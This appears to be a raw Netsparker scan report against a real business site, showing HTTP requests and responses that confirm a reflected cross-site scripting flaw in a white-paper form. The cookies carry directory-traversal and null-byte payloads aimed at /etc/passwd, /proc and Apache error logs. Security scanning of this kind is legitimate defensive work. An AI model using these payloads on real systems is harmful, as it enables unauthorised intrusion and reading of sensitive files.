OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 229
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

company='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000367)%3c%2fscript%3e&companyServices=3&email=netsparker%40example.com&firstName=Smith&iusrc=3&lastName=Smith&parentPage=3&phone=3&src=aboutUs&Submit=3&url=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:20:03 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=B2AC4951C334EC42E37C39F904846994; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content=""/> <meta name="description" content=""/> <meta name="robots" content="index; follow"/> <title></title> <link href="/css/reset.css" rel="stylesheet" type="text/css"><link href="/css/grid.css" rel="stylesheet" type="text/css"><link href="/css/newstyle.css" rel="stylesheet" type="text/css"><script type="text/javascript" src="/js/jquery-1.2.1.js"></script><script type="text/javascript" src="/js/ajax.js"></script><script type="text/javascript" src="/js/ajax-dynamic-list.js"></script><script type="text/javascript" src="/js/default.js"></script><script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {}</script></head><body><div class="container"> <div class="wrapper"> <div class="header"> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; 
padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. 
Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" 
onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('White Paper Form',0,'')" alt="" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerAdvertiseActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Partner</a></li> <li class="headerAboutus"><a 
href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <div class="clear"></div> <div class="grid_5 aboutUs" style="margin-left:13px;margin-top:20px;"><a class="secondaryAction" style="margin-left:0;text-decoration: none;"><strong>About InsideUp</strong></a> | <a href="management.html" class="secondaryAction">Management</a> | <a href="pressRelease.html" class="secondaryAction">News Releases</a> | <a href="careers.html" class="secondaryAction">Careers</a> | <a href="contactUs.html" class="secondaryAction">Contact Us</a></div>
<div class="grid_5 aboutUs" style="margin-left:13px;margin-top:25px;"><span>Use InsideUp to Acquire New Business Service Customers</span></div>
<div class="clear"></div>
<div class="grid_1 aboutUs" style="margin-left:13px;margin-top:25px;">
<p>Founded by performance-based marketing, online advertising and lead generation experts, InsideUp operates an online lead generation platform that's dedicated solely to serving the needs of business service providers and their potential customers. InsideUp's online media network, dynamic business-matching lead generation system and leading-edge marketing practices provide business service firms with ready-to-buy qualified and verified sales leads, all delivered in real time.</p>
<p>InsideUp's platform also helps companies who are seeking business services to locate the right service provider for their specific needs. Companies seeking business services use InsideUp's online platform to access helpful vendor selection tools and content plus pricing and feature comparisons from several service vendors. Companies receive competitive bids from only pre-screened, high-quality vendors who meet their specific business needs.</p>
<p>This is all made possible by InsideUp's unique, proprietary platform, which combines next generation business-matching and prospect-profiling technologies with powerful search engine, social media and lead generation technologies.</p>
<p style="margin-bottom:15px;">Clearly most business service providers need a cost-effective and qualified pipeline of fresh sales prospects who are actively interested in what they sell. These providers are keenly interested in all sales prospects who can be converted into long-term, satisfied customers. InsideUp puts these business service providers into direct contact with prospects who are actively in the marketplace to purchase the type of services they provide.</p>
<img src="/images/party-links.jpg" alt="Links" border="0" usemap="#Map">
<map name="Map">
<area shape="rect" coords="2,1,184,64" href="https://twitter.com/VendorSourcing" target="_blank">
<area shape="rect" coords="198,1,379,63" href="http://www.youtube.com/insideupvendors" target="_blank">
<area shape="rect" coords="390,1,575,60" href="http://insideup.com/blogs/b2bsourcing" target="_blank">
</map> </div>
<div class="grid_4">
<div class="aboutUsForm" >
<form method="post" action="/whitePapaper.html"> <input type="hidden" name="src" value="aboutUs"> <input type="hidden" name="iusrc" value="3"> <input type="hidden" name="parentPage" value="3"> <table width="284" border="0" cellpadding="0" cellspacing="0" style="background-color:#ededed;"> <tr> <td colspan="2" class="head"> To get more information and receive a free copy of white paper "What Every Business Service Marketer Should Know about Online Lead Generation," simply complete the form below: </td> </tr> <tr> <td style="width:100px;">First Name</td> <td style="text-align:left;"> <input name="firstName" type="text" value="Smith"/> </td> </tr> <tr> <td>Last Name</td> <td> <input name="lastName" type="text" value="Smith"/> </td> </tr> <tr> <td>Company</td> <td> <input name="company" type="text" value="'"--></style></script><script>netsparker(0x000367)</script>"/> </td> </tr> <tr> <td>Phone Number</td> <td> <input name="phone" type="text" value="3"/> </td> </tr> <tr> <td>Email Address</td> <td> <input name="email" type="text" value="netsparker@example.com"/> </td> </tr> <tr> <td>Website</td> <td> <input name="url" type="text" value="3"/> </td> </tr> <tr> <td>Your Company's <br> Services?</td> <td> <input name="companyServices" type="text" value="3"/> </td> </tr> <tr> <td>..
- /whitePapaper.html

/whitePapaper.html CONFIRMED

http://www.insideup.com/whitePapaper.html

Parameters

Parameter Type Value
company POST 3
companyServices POST '"--></style></script><script>alert(0x0003B8)</script>
email POST netsparker@example.com
firstName POST Smith
iusrc POST 3
lastName POST Smith
parentPage POST 3
phone POST 3
src POST aboutUs
Submit POST 3
url POST 3

Request

POST /whitePapaper.html HTTP/1.1
Referer: http://www.insideup.com/aboutUs.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 229
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

company=3&companyServices='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0003B8)%3c%2fscript%3e&email=netsparker%40example.com&firstName=Smith&iusrc=3&lastName=Smith&parentPage=3&phone=3&src=aboutUs&Submit=3&url=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:20:19 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=DA48E834479055D75BDFD5DF17795632; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content=""/> <meta name="description" content=""/> <meta name="robots" content="index; follow"/> <title></title> <link href="/css/reset.css" rel="stylesheet" type="text/css"><link href="/css/grid.css" rel="stylesheet" type="text/css"><link href="/css/newstyle.css" rel="stylesheet" type="text/css"><script type="text/javascript" src="/js/jquery-1.2.1.js"></script><script type="text/javascript" src="/js/ajax.js"></script><script type="text/javascript" src="/js/ajax-dynamic-list.js"></script><script type="text/javascript" src="/js/default.js"></script><script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {}</script></head><body><div class="container"> <div class="wrapper"> <div class="header"> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; 
padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. 
Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" 
onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('White Paper Form',0,'')" alt="" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerAdvertiseActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Partner</a></li> <li class="headerAboutus"><a 
